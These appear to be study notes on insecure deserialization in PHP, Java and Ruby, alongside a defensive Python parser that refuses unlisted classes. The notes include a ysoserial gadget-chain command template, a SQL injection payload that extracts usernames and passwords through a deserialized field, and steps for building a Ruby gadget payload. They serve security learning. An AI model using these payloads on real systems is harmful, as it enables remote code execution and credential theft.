Insecure Deserialization

** base64 encoding with delimiters \00 can also be used?

PHP

Serialized object template: O:<strlen(classname)>:"<classname>":<property count>:{s:<len>:"<property>";s:<len>:"<value>";s:<len>:"<property>";b:1;}

- Methods: serialize(), unserialize()
- Loose comparison (==) of a deserialized value against a string (PHP 7 and earlier; PHP 8 changed string-to-number comparison so these no longer hold):
  0 == "passwordAbcd" -> true (the string is converted to an integer from its leading digits; with no leading digit it becomes 0)
  9 == "a9sbv6bk2d9naeeoch2yffy2fp6zfz13" -> false (the string begins with a letter, so it converts to 0, not 9)

Anatomy of a serialize()'ed value:

String
s:size:value;

Integer
i:value;

Boolean
b:value; (does not store "true" or "false", does store '1' or '0')

Null
N;

Array
a:size:{key definition;value definition;(repeated per element)}

Object
O:strlen(object name):"object name":property count:{s:strlen(property name):"property name";property definition;(repeated per property)}

- String values are always in double quotes.
- Array keys are always integers or strings:
  - null => 'value' serializes as s:0:"";s:5:"value";
  - true => 'value' serializes as i:1;s:5:"value";
  - false => 'value' serializes as i:0;s:5:"value";
  - array(whatever the contents) => 'value' raises an "illegal offset type" warning, because an array cannot be used as a key; if a variable containing an array is used as the key, it serializes as s:5:"Array";s:5:"value";
  - using an object as a key behaves the same way as using an array.
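As an added example (not part of these notes), a small Python parser for the serialize() grammar above: it decodes a value and, because it records every class name the payload would instantiate, can refuse an object whose class is not on an allowlist before the data ever reaches unserialize(). The sample cookie value and the class names in it are constructed.

```python
"""PHP serialize() parser for the s/i/b/N/a/O grammar above that also reports the
classes a payload would instantiate, so untrusted input can be screened first."""
import re

def _parse(data, pos, classes):
    tag = data[pos]
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in "ib":                                  # i:<int>;  b:<0|1>;
        end = data.index(";", pos)
        val = int(data[pos + 2:end])
        return (val == 1) if tag == "b" else val, end + 1
    if tag == "s":                                   # s:<len>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip :"
        if data[start + length:start + length + 2] != '";':
            raise ValueError("declared string length does not match content")
        return data[start:start + length], start + length + 2
    if tag in "aO":                                  # a:<n>:{...}  O:<len>:"<cls>":<n>:{...}
        cls = None
        if tag == "O":
            m = re.match(r'O:(\d+):"', data[pos:])
            name_start = pos + m.end()
            cls = data[name_start:name_start + int(m.group(1))]
            classes.add(cls)                         # class unserialize() would instantiate
            pos = name_start + len(cls)              # at the closing quote
        pos += 1                                     # at ':' before the element count
        colon = data.index(":", pos + 1)
        count = int(data[pos + 1:colon])
        pos = colon + 2                              # skip :{
        out = {"__class__": cls} if cls else {}
        for _ in range(count):                       # key;value; pairs (int or string keys)
            key, pos = _parse(data, pos, classes)
            val, pos = _parse(data, pos, classes)
            out[key] = val
        return out, pos + 1                          # skip }
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def php_unserialize(data, allowed_classes=()):
    """Decode data, refusing classes outside the allowlist (cf. PHP 7's unserialize() allowed_classes option)."""
    classes = set()
    value, _ = _parse(data, 0, classes)
    unexpected = classes - set(allowed_classes)
    if unexpected:
        raise ValueError(f"refusing to deserialize classes {sorted(unexpected)}")
    return value

# Constructed sample session cookie value (not taken from any real application).
SESSION = 'O:4:"User":2:{s:8:"username";s:5:"alice";s:5:"admin";b:0;}'
```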

- Magic methods: __construct, __destruct, __sleep (called during serialization), __wakeup (called during deserialization)
- Gadget chain for Apache Commons (Java): java -jar ysoserial.jar CommonsCollections2 '<command>' | base64 | tr -d "\n"
- Check stack traces for PHP framework versions
- Token paired with an HMAC-SHA1 signature: {"token":"=","sig_hmac_sha1":""}

Java

- A serialized Java object starts with rO0 when converted to Base64 (the AC ED 00 05 stream header)
- Class and methods: java.io.Serializable, writeObject(), readObject()
- Magic method: ObjectInputStream.readObject()
- Universal detection in any Java version: the URLDNS chain triggers a DNS lookup
- If the target JRE is not patched with JEP 290: exploitation of RMI registries with JRMPClient and JRMPListener
- The transient keyword in Java is used to avoid serialization: any field of a data structure declared transient is not serialized.
- The package name of the gadget class is present in the binary serialized object.
- PostgreSQL injection through a deserialized field: the query is built as SELECT * FROM products WHERE id = '%s' LIMIT 1 with the object's id substituted, so the payload goes into the serialized object:
  java PortswiggerGenericSD "' UNION SELECT '1','2','3',CAST((SELECT concat(username,':',password) from users LIMIT 1) as int),'5','6','7','8' --"

Python

Ruby

- Ruby on Rails: Rails automagically deserializes incoming requests that contain JSON or XML parameters. It does not do this for YAML, because it would be unsafe; however, the XML parser interprets elements of the form <foo type="yaml">...</foo> as YAML documents.
- RoR deserialization [Ruby 2.0 - 2.5]: https://www.elttam.com/blog/ruby-deserialization/#:~:text=GENERATING%20THE%20PAYLOAD
  1. Replace "id" in the payload-generating code from the linked post.
  2. Run ruby code.rb and copy the Base64 output.
  3. echo "<base64 code>" | tr -d "\n"
  4. URL-encode the result (urlencode, not urlencode_plus) before placing it in the serialized object.
- Marshal object: run the commands below in a terminal to decode one

  irb
  require "base64"
  Base64.decode64("<base64 encoded marshal object>")
  e.g. "\x04\bo:\tUser\a:\x0E@usernameI\"\vwiener\x06:\x06EF:\x12@access_tokenI\"%izmzfgzfd1vx41d32kk3w5ig0ee5pzun\x06;\aF\n"
